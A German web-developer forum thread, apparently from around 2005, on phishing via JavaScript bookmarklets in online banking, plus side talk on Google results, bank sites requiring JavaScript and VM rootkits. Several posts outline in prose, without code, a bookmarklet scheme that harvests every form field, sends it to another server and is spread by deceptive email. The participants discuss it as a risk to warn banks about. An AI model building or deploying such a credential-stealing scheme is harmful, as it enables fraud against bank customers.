Bleibt zu hoffen, dass diese Nachrichtendienste nicht vor Phishing per Bookmarklet warnen, weil sonst die Email an Glaubwürdigkeit verlieren kann.
Bemerkenswert:
- Das Bookmarklet ist auch ohne Anpassung nicht auf bestimmte Kreditinstitute beschränkt.
Wie denn das? Die Banken werden ja wohl kaum ihre Online-Banking-Seiten gleich gestalten. Oder willst du dich darauf verlassen, dass jede Bank Formularfelder mit aussagekräftigen Namen wie pw oder tan verwendet?
Du bringst mich übrigens gerade auf eine wunderbare Idee: In Ländern, in denen von links nach rechts geschrieben wird, steht das Feld für den Benutzernamen meist vor dem Passwort, worauf sich z.B. dieses Bookmarklet verlassen könnte. Warum nicht im Quellcode erst das Passwort und dann per CSS die Reihenfolge entsprechend der gewohnten Schreibrichtung ändern?
- Die Bookmarks für das Homebanking bleiben ansonsten unberührt.
- Die Seiten der Bank bleiben äußerlich unberührt.
- Das Bookmarklet tritt wahlwise gar nicht oder in Form einer Bestätigung in Erscheinung.
Mit Bestätigung könnte bei diesem Szenario u.U. sogar Vorteile haben: „Ah, die Software schützt meine Kontodaten.“
- Es gibt keine browser-seitigen Warnmeldungen.
Wieso auch?
- Die Bank-Transaktionen funktionieren.
Die unerwünschten auch.
- Das Leeren des Caches oder das Löschen von Cookies nutzt nichts.
Leider.
Was daran "ein starkes Stück" sein soll, einen unbedarften Internet-Nutzer in solcher oder ähnlicher Weise hinters Licht zu führen, kann ich nicht nachvollziehen.
Die gewählte Formulierung soll ausdrücken, dass ich es ausgesprochen dreist finde, wenn auf diese Weise die Unkenntnis unbedarfter Anwender schamlos ausgenutzt wird. „Das ist ein starkes Stück“ heißt – zumindest in Nordhessen – soviel wie „Das ist aber ganz schön dreist“ oder „das ist aber ganz schön unverschämt“.
Viele Grüße,
Robert
Hallo.
- Man verweise auf ein Bookmarklet, das die Eingaben in Formularelemente an einen anderen Server weiterleitet.
Und vergesse dabei nicht, diese Funktionalität auf gar keinen Fall zu erwähnen oder erkennbar zu machen.
Oder zu tarnen. Aber was wäre denn für Laien erkennbar? Entweder man ist prinzipiell misstrauisch oder eben nicht. Die Gefährlichkeit von ein paar Zeilen Code lässt sich doch von Laien überhaupt nicht einschätzen.
Informiertere Zeitgenossen werden darauf wohl nicht hereinfallen, die typische Phishing-Zielgruppe leider schon.
[...]
Auch hier sollten bei informierteren Benutzern einige Alarmglocken läuten.
Bei gezielter Fehlinformation, gewohnt langer Reaktionszeit verbreiteter Medien, vermeintlich vertrauenswürdigen Quellen sowie Berücksichtigung der unter "Bemerkenswert" zusammengefassten Punkte dürften selbst viele der sonst gut Informierten als Opfer in Frage kommen, von den übrigen schätzungsweise 99 Prozent natürlich ganz zu schweigen.
- Man garniere die Nachricht mit Warnungen vor Phishing-Seiten und verweise auf einschlägige Artikel von Nachrichtendiensten oder Kreditinstituten.
Bleibt zu hoffen, dass diese Nachrichtendienste nicht vor Phishing per Bookmarklet warnen, weil sonst die Email an Glaubwürdigkeit verlieren kann.
Wenn ich auf einen Artikel verweise, weiß ich in der Regel um seinen Inhalt.
Bemerkenswert:
- Das Bookmarklet ist auch ohne Anpassung nicht auf bestimmte Kreditinstitute beschränkt.
Wie denn das? Die Banken werden ja wohl kaum ihre Online-Banking-Seiten gleich gestalten. Oder willst du dich darauf verlassen, dass jede Bank Formularfelder mit aussagekräftigen Namen wie pw oder tan verwendet?
Wozu benötigst du Namen, wenn du schlicht alle Felder der Reihe nach abklappern kannst?
Du bringst mich übrigens gerade auf eine wunderbare Idee: In Ländern, in denen von links nach rechts geschrieben wird, steht das Feld für den Benutzernamen meist vor dem Passwort, worauf sich z.B. dieses Bookmarklet verlassen könnte. Warum nicht im Quellcode erst das Passwort und dann per CSS die Reihenfolge entsprechend der gewohnten Schreibrichtung ändern?
Ja, eine wunderbare Idee, bei der aber auch nur ein Array in der im Quelltext festgelegten Reihenfolge ein- und später wieder ausgelesen wird.
Die gewählte Formulierung soll ausdrücken, dass ich es ausgesprochen dreist finde, wenn auf diese Weise die Unkenntnis unbedarfter Anwender schamlos ausgenutzt wird. „Das ist ein starkes Stück“ heißt – zumindest in Nordhessen – soviel wie „Das ist aber ganz schön dreist“ oder „das ist aber ganz schön unverschämt“.
Das war mir schon klar. Ich bezog mich auch gar nicht auf den Versuch, sondern auf das von dir erwähnte Gelingen in dem Fall, dass es jemand versucht.
MfG, at
Hier ein Link zu einer Bookmarklet-Sammlung, die man sinnigerweise nur mit dem Mozilla-Browser zu sehen bekommt:
http://www.bookmarklets.com/tools/categor.html
Viel Spaß dabei.
Hallo,
Hier ein Link zu einer Bookmarklet-Sammlung, die man sinnigerweise nur mit dem Mozilla-Browser zu sehen bekommt:
http://www.bookmarklets.com/tools/categor.html
So long,
Martin
Ich habe mit FF auf Google nach Bookmarklet gesucht - der Link auf die Liste unter bookmarklet.com wurde zumindest auf den ersten Resultatseiten nicht angezeigt.
Dasselbe mit Mozilla ergab einen Verweis an erster Stelle.
Mahlzeit!
Ich habe mit FF auf Google nach Bookmarklet gesucht - der Link auf die Liste unter bookmarklet.com wurde zumindest auf den ersten Resultatseiten nicht angezeigt.
Ah, dann habe ich dich falsch verstanden. Ich dachte, du wolltest sagen, dass diese Seite nur im Mozilla "funzt"[tm] - und das wollte ich mit meinem IE-Screenshot widerlegen. Ich bekomme zwar am Anfang der Seite einen Wink, dass ich doch bitte Javascript aktivieren möge, aber da lese ich geflissentlich drüber hinweg. ;-)
Und wieso soll Google unterschiedliche Ergebnislisten bringen, wenn man verschiedene Browser nutzt? Das wäre mir jedenfalls neu. Ich kann zumindest mit IE 6.0, FF 1.0 und Opera 8.50 keinen Unterschied feststellen (mehr hab ich hier nicht zur Hand). Sie liefern mir bei einer Google-Suche nach bookmarklet alle die http://www.bookmarklet.com/ an erster Stelle.
Schönen Tag noch,
Martin
Hallo Martin,
Und wieso soll Google unterschiedliche Ergebnislisten bringen, wenn man verschiedene Browser nutzt? Das wäre mir jedenfalls neu. Ich kann zumindest mit IE 6.0, FF 1.0 und Opera 8.50 keinen Unterschied feststellen (mehr hab ich hier nicht zur Hand). Sie liefern mir bei einer Google-Suche nach bookmarklet alle die http://www.bookmarklet.com/ an erster Stelle.
Vergleiche mal den Inhalt der Seite, auf die Google verweist, mit dem Inhalt des Links, den ich gepostet hatte.
Einen Hinweis habe ich auf bookmarklet.com gefunden: Der Server soll angeblich nur die zum gerade benutzten Browser passenden Bookmarklets anbietet. Vermutlich greift da der Server ein.
Hi,
Vergleiche mal den Inhalt der Seite, auf die Google verweist, mit dem Inhalt des Links, den ich gepostet hatte.
Google verweist nur auf http://www.bookmarklet.com/ direkt (ich habe jedenfalls keine Deeplinks gesehen), und auf der Site komme ich nicht weiter, ohne Javascript zu aktivieren. Wenn ich aber deinen Link direkt aufrufe (/tools/categor.html), dann umgehe ich die Javascript-Abfrage und der Inhalt der Seite ist wieder in allen vorher genannten Browsern gleich.
Einen Hinweis habe ich auf bookmarklet.com gefunden: Der Server soll angeblich nur die zum gerade benutzten Browser passenden Bookmarklets anbietet. Vermutlich greift da der Server ein.
Diesen Hinweis finde ich nicht. Er wäre auch Unsinn, da der Server nicht erkennen kann, welchen Browser ich benutze. Dazu müsste er entweder ein Javascript bei mir ausführen dürfen (darf er nicht), das das navigator-Objekt abfragt, oder einen aussagekräftigen User Agent im HTTP-Header bekommen (bekommt er nicht, meine Browser melden sich alle einheitlich als Generic Browser, Win32).
So long,
Martin
Diesen Hinweis finde ich nicht. Er wäre auch Unsinn, da der Server nicht erkennen kann, welchen Browser ich benutze. Dazu müsste er entweder ein Javascript bei mir ausführen dürfen (darf er nicht), das das navigator-Objekt abfragt, oder einen aussagekräftigen User Agent im HTTP-Header bekommen (bekommt er nicht, meine Browser melden sich alle einheitlich als Generic Browser, Win32).
Meine Browsermelden sich als das, was sie sind und JS ist aktiviert.
Ich würde mir das Verhalten einfach so erklären: Beim Aufruf der Haupseite wird nachgesehen, ob es sich um einen Browser handelt, für den Bookmarklets in der großen Sammlung stehen und wenn ja, wird der Inhalt der Bookmarklet-Sammlung vom Browser geschickt. Clever sind die Jungs...
Heißa, Der, ;-)
Und wieso soll Google unterschiedliche Ergebnislisten bringen, wenn man verschiedene Browser nutzt? Das wäre mir jedenfalls neu. Ich kann zumindest mit IE 6.0, FF 1.0 und Opera 8.50 keinen Unterschied feststellen (mehr hab ich hier nicht zur Hand). Sie liefern mir bei einer Google-Suche nach bookmarklet alle die http://www.bookmarklet.com/ an erster Stelle.
Ich hatte das auch mal mit einer Seite. Bei einem Freund, Opera 8.50 unter Windows XP, wurde die Seite bei einer Google-Suche nach ihrem Titel als zweites Ergebnis aufgelistet, bei mir, unter Linux, in allen Browsern, auch Opera 8.50, kam sie überhaupt nicht in den Ergebnissen vor. Ich habe dann mal im Internet herumgefragt, plattformunabhängig wurde die Seite bei manchen Leuten angezeigt, bei manchen nicht. Es lässt irgendwie vermuten, dass Google abhängig von der IP, unter der man surft, einen anderen „Mirror“ schaltet, und der Suchergebniscache nicht sofort auf allen Mirrors abgeglichen wird.
Gautera!
Grüße aus Biberach Riss,
Candid Dauth
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt:
Du hattest dir nicht die Beispiele auf heise angesehen, die ich dir in dem anderen Thread gezeigt hatte, wo du schon mal behauptet hast JS wäre ungefährlich?
JS kann auf einem schlecht gewartetem System extrem gefährlich sein, da durch diverser Lücken es möglich ist x-beliebige Programme auszuführen und/oder zu installieren.
Natürlich geht das nicht immer und überall, da dies mit JS eben gerade nicht gehen soll. Aber durch diverse Features (z.b. die Verzahnung mit dem System im IE oder durch Erweiterungen im Mozilla) ist es eben dich möglich.
Also, JS ist nicht generell gefährlich, aber je unbedarfter ein Benutzer ist umso größer ist die Gefahr.
Struppi.
Du hattest dir nicht die Beispiele auf heise angesehen, die ich dir in dem anderen Thread gezeigt hatte
Da muß ich gleich nochmal nachsehen - danke für den Hinweis. Zuweilen verliert man die Übersicht, was gelesen ist und was nicht, wenn man mit verschiedenen Systemen in einundemselben Forum unterwegs ist.
... wo du schon mal behauptet hast JS wäre ungefährlich?
Hatte ich das? Eher nicht, denn ich wollte wissen was an einschlägigen Warnungen dran ist - ganz ergebnisoffen.
Wie bereits geschrieben: Ich will eine fundierte Antwort auf Fragen in dieser Richtung geben können, wenn mich jemand fragt.
Moin!
Du hattest dir nicht die Beispiele auf heise angesehen, die ich dir in dem anderen Thread gezeigt hatte
Da muß ich gleich nochmal nachsehen - danke für den Hinweis. Zuweilen verliert man die Übersicht, was gelesen ist und was nicht, wenn man mit verschiedenen Systemen in einundemselben Forum unterwegs ist.
Deshalb kann dieses Forum gelesene Postings serverseitig markieren, so dass man nicht von der "besuchte Links"-Markierung eines einzelnen Browsers abhängig ist.
Funktioniert aber nur, wenn man einen Account anmeldet.
- Sven Rautenberg
Basierend auf den hier geäußerten, teilweise ausgesprochen realistischen Angriffsmöglichkeiten durch Bookmarklets habe ich eine Frage an die Online-Banker:
Gibt es Online-Banken, deren Webseite man unbedingt mit aktiviertem JavaScript besuchen muss, damit diese funktionieren?
So, wie es aktuell aussieht, sollte die weitere Erforschung dieses Themas nicht ins Stocken kommen und wir sollten – vielleicht unter Mithilfe des CCC oder publikumswirksam des ct magazins – die Banken ermahnen, aus den hier genannten und sich eventuell noch ergebenden Gründen, ihre Online-Banking-seiten so zu gestalten, dass sie ohne JavaScript nutzbar sind und vor allem den Benutzer _vor_ dem Banking darauf hinweisen, dass er JavaScript auszuschalten habe.
Viele Grüße,
Robert Bienert
Hallo Robert,
Gibt es Online-Banken, deren Webseite man unbedingt mit aktiviertem JavaScript besuchen muss, damit diese funktionieren?
bei der Postbank ist es definitiv nicht erforderlich. Aber ich schließe aus ein paar anderen Ausführungen hier, dass dies eine rühmliche Ausnahme ist.
[...] die Banken ermahnen, aus den hier genannten und sich eventuell noch ergebenden Gründen, ihre Online-Banking-seiten so zu gestalten, dass sie ohne JavaScript nutzbar sind
Bin ich sofort einverstanden. Aber ich fürchte, dass die Sturheit und Starrköpfigkeit der IT-Verantwortlichen bei den Banken grenzenlos ist.
und vor allem den Benutzer _vor_ dem Banking darauf hinweisen, dass er JavaScript auszuschalten habe.
Hmm. Welcher User, der JS normalerweise aktiviert hat, würde auf den guten Rat tatsächlich eingehen?
So long,
Martin
Moin!
Gibt es Online-Banken, deren Webseite man unbedingt mit aktiviertem JavaScript besuchen muss, damit diese funktionieren?
bei der Postbank ist es definitiv nicht erforderlich. Aber ich schließe aus ein paar anderen Ausführungen hier, dass dies eine rühmliche Ausnahme ist.
Das ist doch eine erfreuliche Nachricht! Bei meiner Hausbank sieht es so aus, wenn ich auf Online-Banking klicke:
Die von Ihnen ausgewählte Seite kann nicht automatisch angezeigt werden, weil Sie entweder JavaScript deaktiviert oder einen PopUp-Blocker aktiviert haben.
Klicken Sie bitte hier, um die Seite anzuzeigen.
Was soll denn das? Wieso verlinken die nicht direkt?
Da ich kein Online-Banking mache, habe ich mal die Demo ausprobiert:
Hinweis: Ihr Browser unterstützt kein JavaScript oder Sie haben JavaScript deaktiviert.
Dadurch ergibt sich ein leicht eingeschränkter Funktionsumfang der Demonstration.
Den eingeschränkten Funktionsumfang habe ich dabei nicht feststellen können. Aber die Aufmachung ist unter Sicherheitsaspekten natürlich suboptimal.
[...] die Banken ermahnen, aus den hier genannten und sich eventuell noch ergebenden Gründen, ihre Online-Banking-seiten so zu gestalten, dass sie ohne JavaScript nutzbar sind
Bin ich sofort einverstanden. Aber ich fürchte, dass die Sturheit und Starrköpfigkeit der IT-Verantwortlichen bei den Banken grenzenlos ist.
Die Sturheit und Starrköpfigkeit von IT-Verantwortlichen scheint häufiger grenzenlos zu sein, siehe den Auschluss von BMW aus dem Google-Index. Aber genau deshalb habe ich ja auf den CCC und das ct magazin verwiesen: Öffentlichkeit ist immer ganz praktisch. Nachdem klar war, dass eine EC-Karte knacken ein Sonntagsspaziergang ist, haben die Banken ja auch das System umgestellt.
und vor allem den Benutzer _vor_ dem Banking darauf hinweisen, dass er JavaScript auszuschalten habe.
Hmm. Welcher User, der JS normalerweise aktiviert hat, würde auf den guten Rat tatsächlich eingehen?
Die Bank könnte ihn dazu zwingen:
<!-- Folgendes Formular, der onsubmit-Handler verhindert dabei das
- Anmelden mit aktiviertem JavaScript:
-->
<form action="https://securebanking.example.com/" method="post"
onsubmit="[code lang=javascript]alert('Sie müssen – zu ihrer Sicherheit – vor dem Anmelden JavaScript deaktivieren.'); return false
~~~">
<p><label for="f1">Anmeldename:</label> <input type="text" name="f1" size="20" /></p>
<p><label for="f2">PIN:</label> <input type="password" name="f2" size="10" /></p>
<button type="submit" id="btnSubmit">Anmelden</button>
</form>
[/code]
Aber wahrscheinlich ist diese Lösung technisch zu einfach.
Viele Grüße,
Robert
Hallo Robert
Die Bank könnte ihn dazu zwingen:
[...]
Aber wahrscheinlich ist diese Lösung technisch zu einfach.
Da gäbe es wohl auch noch ein Problem mit vielen Nutzern. Für mich ist das
kein Problem, ein Klick und Javascript ist an oder aus.
Wie bringst du das aber einem durchschnittlichen IE-Nutzer bei?
Auf Wiederlesen
Detlef
Moin!
Die Bank könnte ihn dazu zwingen:
[...]
Aber wahrscheinlich ist diese Lösung technisch zu einfach.
Da gäbe es wohl auch noch ein Problem mit vielen Nutzern. Für mich ist das kein Problem, ein Klick und Javascript ist an oder aus.
Wie bringst du das aber einem durchschnittlichen IE-Nutzer bei?
Mit einem netten kleinen Tutorial und vielen bunten Bildern:
„Wählen sie im Menü Extras den Punkt Internetoptionen aus [Screenshot des ausgeklappten Menüs], rufen sie den Reiter … auf [Screenshot …] …“ Man muss nur wollen.
Viele Grüße,
Robert
Hallo Robert
„Wählen sie im Menü Extras den Punkt Internetoptionen aus [Screenshot des ausgeklappten Menüs], rufen sie den Reiter … auf [Screenshot …] …“ Man muss nur wollen.
Oh die Ärmsten, wie kriegen die das dann für die Seite wieder an, die nur mit
Javascript funktioniert?
Auf Wiederlesen
Detlef
Hallo.
Oh die Ärmsten, wie kriegen die das dann für die Seite wieder an, die nur mit
Javascript funktioniert?
Ein Verweis auf dieses Forum könnte da schon genügen. Allerdings liefen die Kreditinstitute dann natürlich Gefahr, einige Online-Kunden nie mehr wiederzusehen.
MfG, at
Moin!
„Wählen sie im Menü Extras den Punkt Internetoptionen aus [Screenshot des ausgeklappten Menüs], rufen sie den Reiter … auf [Screenshot …] …“ Man muss nur wollen.
Oh die Ärmsten, wie kriegen die das dann für die Seite wieder an, die nur mit Javascript funktioniert?
OK, ich gebe zu, dass die Installation eines ausgefuchsten oder dienstbaren Webbrowsers wahrscheinlich einfacher wäre ;-) Für alles Andere, gibt es doch die guten bekannten, die sich bestens mit EDV auskennen.
Viele Grüße,
Robert
Moin!
Ich habe jedenfalls für mich beschlossen, daß für die wenigen Gelegenheiten, in denen ich per PIN/TAN auf meine Bankkonten zugreifen muß, eine VMware-5-Maschine mit Linux eingerichtet wird, die für Bankingsessions geklont wird, um sicher zu gehen, daß immer mit einem jungfräulichen Betriebssystem gearbeitet wird. (Das ist erfreulicherweise ein Feature von VMware Workstation 5.)
Es gibt Neues Houyhnhnm, willst du wirklich immer noch auf dein VMware vertrauen: VM Rootkits: The Next Big Threat?. Sobald es eine böswillige Virtuelle Maschine geschafft hat, sich dein Betriebssystem zu krallen und in einer VM auszuführen, brauchst du auch kein Online-Banking mehr in VMware zu machen: Dein Browser sowie dein Chipkarten-Leser können von außen (dem VM Rootkit) kontrolliert werden.
Viele Grüße,
Robert